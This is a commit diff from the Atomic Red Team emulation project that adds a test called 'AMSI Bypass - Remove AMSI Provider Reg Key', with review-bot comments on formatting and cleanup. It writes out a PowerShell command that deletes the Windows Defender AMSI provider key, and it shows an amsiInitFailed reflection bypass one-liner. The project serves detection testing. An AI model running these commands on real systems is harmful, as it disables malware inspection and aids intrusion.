Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2019-09-17 19:17:51 +00:00
parent a969a01805
commit 7f35271b8e
4 changed files with 40 additions and 0 deletions
+23
@@ -26,6 +26,8 @@
- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
<br/>
@@ -260,3 +262,24 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
```
<br/>
<br/>
## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
<br/>
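Review bot: the two code fences under "Run it with `powershell`!" and "Cleanup Commands:" carry no language tag; tagging them ```powershell would give the rendered page highlighting consistent with the heading. Since the description already says removing the provider key disables AMSI inspection, it would help readers to add one sentence stating that the system stays without Windows Defender AMSI inspection from the moment the test runs until the cleanup command is executed, so the test should not be left in the removed state on a shared host.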
+1
@@ -194,6 +194,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+15
@@ -6010,6 +6010,21 @@ defense-evasion:
elevation_required: false
command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n"
cleanup_command: "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n"
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: "With administrative rights, an adversary can remove the AMSI Provider
registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis
test removes the Windows Defender provider registry key. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
'
cleanup_command: New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
T1107:
technique:
external_references:
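Review bot: the `cleanup_command` for "AMSI Bypass - Remove AMSI Provider Reg Key" recreates only an empty key with `New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"`, whereas the `command` deletes with `-Recurse`, so any values or subkeys that existed under the original provider key are not restored; consider exporting the key before removal so cleanup can reinstate it exactly, or document in `description` that cleanup restores the registration but not the key's original contents. Minor: the description string ends with a trailing space before `\n` ("registry key. \n").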
+1
@@ -38,6 +38,7 @@
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #10: Uninstall Sysmon [windows]
- Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)